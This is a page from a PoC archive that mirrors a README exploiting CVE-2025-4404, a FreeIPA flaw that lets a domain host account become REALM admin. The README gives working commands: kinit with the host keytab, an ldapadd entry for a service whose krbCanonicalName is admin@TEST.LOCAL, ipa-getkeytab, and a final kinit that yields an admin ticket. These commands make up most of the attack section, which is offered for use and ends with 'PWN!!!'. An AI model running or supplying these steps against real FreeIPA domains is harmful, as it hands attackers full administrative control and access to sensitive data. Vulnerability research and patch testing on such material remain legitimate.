Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-4404 PoC — Freeipa: idm: privilege escalation from host to domain admin in freeipa

Source
https://github.com/Cyxow/CVE-2025-4404-POC
Associated Vulnerability
Title:Freeipa: idm: privilege escalation from host to domain admin in freeipa (CVE-2025-4404)
Description:A privilege escalation from host to domain vulnerability was found in the FreeIPA project. The FreeIPA package fails to validate the uniqueness of the `krbCanonicalName` for the admin account by default, allowing users to create services with the same canonical name as the REALM admin. When a successful attack happens, the user can retrieve a Kerberos ticket in the name of this service, containing the admin@REALM credential. This flaw allows an attacker to perform administrative tasks over the REALM, leading to access to sensitive data and sensitive data exfiltration.
Description
POC for CVE-2025-4404
Readme
# CVE-2025-4404 POC
POC for CVE-2025-4404

If you have a domain computer account (host/pc1.test.local@test.local), then you can add the service by default. And you can set krbPrincipalName and krbCanonicalName. By default, the krbCanonicalName attribute value is missing for the FreeIPA 4.12.4 administrator account. You can request a Kerberos ticket with the value krbPrincipalName, but the ticket will contain the value krbCanonicalName.

Let's go

1) First, we will request a ticket on behalf of the computer account:
`$ kinit host/pc1.test.local@TEST.LOCAL -k -t /etc/krb5.keytab`

2) Add to LDAP service account:
```
$ ldapadd -H ldap://dc1.test.local
dn: krbprincipalname=test/pc1.test.local@TEST.LOCAL,cn=services,cn=accounts,dc=test,dc=local
ipaKrbPrincipalAlias: test/pc1.test.local@TEST.LOCAL
krbPrincipalName: test/pc1.test.local@TEST.LOCAL
objectClass: ipaKrbPrincipal
objectClass: ipaObject
objectClass: ipaService
objectClass: krbPrincipal
objectClass: krbPrincipalAux
objectClass: top
krbCanonicalName: admin@TEST.LOCAL
managedBy: fqdn=pc1.test.local,cn=computers,cn=accounts,dc=test,dc=local
```

3) Request keytab
```
$ ipa-getkeytab -p test/pc1.test.local@TEST.LOCAL -k ./test.keytab --mech=GSSAPI
$ kdestroy -A
```

4) Request ticket
`$ kinit --no-request-pac -k -t ./test.keytab test/pc1.test.local@TEST.LOCAL`

PWN!!!

You can check ticket by:
`ldapwhoami -H ldap://dc1.test.local`
File Snapshot

 [4.0K]  /data/pocs/0890d3000cda49fc43ba21da0b6c5f709776b3ac
└── [1.4K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →